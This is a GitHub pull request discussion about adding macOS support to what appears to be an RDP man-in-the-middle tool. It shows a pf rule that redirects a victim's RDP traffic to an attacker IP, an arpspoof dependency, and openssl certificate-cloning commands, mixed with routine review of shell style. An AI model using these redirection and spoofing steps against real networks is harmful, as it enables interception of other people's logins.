Add support for Darwin (macOS) OS

areYouLazy opened the pull request:
Implements some rudimental functions to handle PF rules
- Adapt kill to support macOS syntax
- Adapt openssl commands
- Add handling of certificate deletion from /tmp/ folder

areYouLazy committed:
Add support for Darwin (macOS) OS
Implements some rudimental functions to handle PF rules
- Adapt kill to support macOS syntax
- Adapt openssl commands
- Add handling of certificate deletion from /tmp/ folder

AdrianVollmer commented on seth.sh:
```diff
@@ -11,32 +11,55 @@ EOF
+            exit 1
+        }
+    done
+fi
```
I think I'd like this change better if we only changed the dependency list in the conditional. I like to avoid duplicate code.

areYouLazy replied:
Sure, do you prefer to parametrize the whole list, or only the NETFILTER_INTERPRETER?
like:
```suggestion
if [ "$OS" == "Darwin" ];
then
    NETFILTER_INTERPRETER=pfctl
else
    NETFILTER_INTERPRETER=iptables
fi
```
or
```suggestion
if [ "$OS" == "Darwin" ];
then
    DEPS_LIST="pfctl openssl arpspoof tcpdump"
else
    DEPS_LIST="iptables openssl arpspoof tcpdump"
fi
```

AdrianVollmer commented on seth.sh:
```diff
@@ -66,71 +114,137 @@ set_iptables_2 () {
+# Define function to add/remove pf rules on the fly for RDP routing and NAT
+set_pf_1 () {
+    # This works but is not able to keep the connection up after authentication
+    echo "rdr pass on en7 proto tcp from "$VICTIM_IP" to any port 3389 -> "$ATTACKER_IP" port 3389" >> $PF_TMP_FILE
```
Just a minor thought here: Are the quotes around the variables necessary? I don't use Darwin but in a POSIX shell they would not be necessary.

areYouLazy replied:
Not really, just a old habit from me to prevent errors if variables contains white spaces, I'm going to drop those quotes

AdrianVollmer commented on clone-cert.sh:
```diff
@@ -67,14 +68,20 @@ KEY_LEN="$(openssl x509  -in "$ORIG_CERT_FILE" -noout -text \
+if [ "$OS" == "Darwin" ];
+then
+    offset="$(openssl asn1parse -in "$ORIG_CERT_FILE" | grep SEQUENCE \
+        | tail -n1 | head -n1 | awk '{print $1}' | sed 's/:.*//')"
```
If this line does in Darwin what it is supposed to do, shouldn't it work in bash as well? If so, we wouldn't need the conditional.

A quick test on my system showed that it does indeed do the same. So I suggest to simply replace the original line with this one if the original line does not work on Darwin.

areYouLazy replied:
Sure, didn't have time to test in on Linux, and would like to preserve your code over mine if possible.
I'm ok to keep only the new one if it works on linux
Also here, I think we should add awk to the deps_list as I'm not sure that every linux box comes with awk preinstalled

areYouLazy committed:
Tuning macOS Support
- Fix sed syntax and implement awk where needed
- Implement more granular control over sysctl for macOS
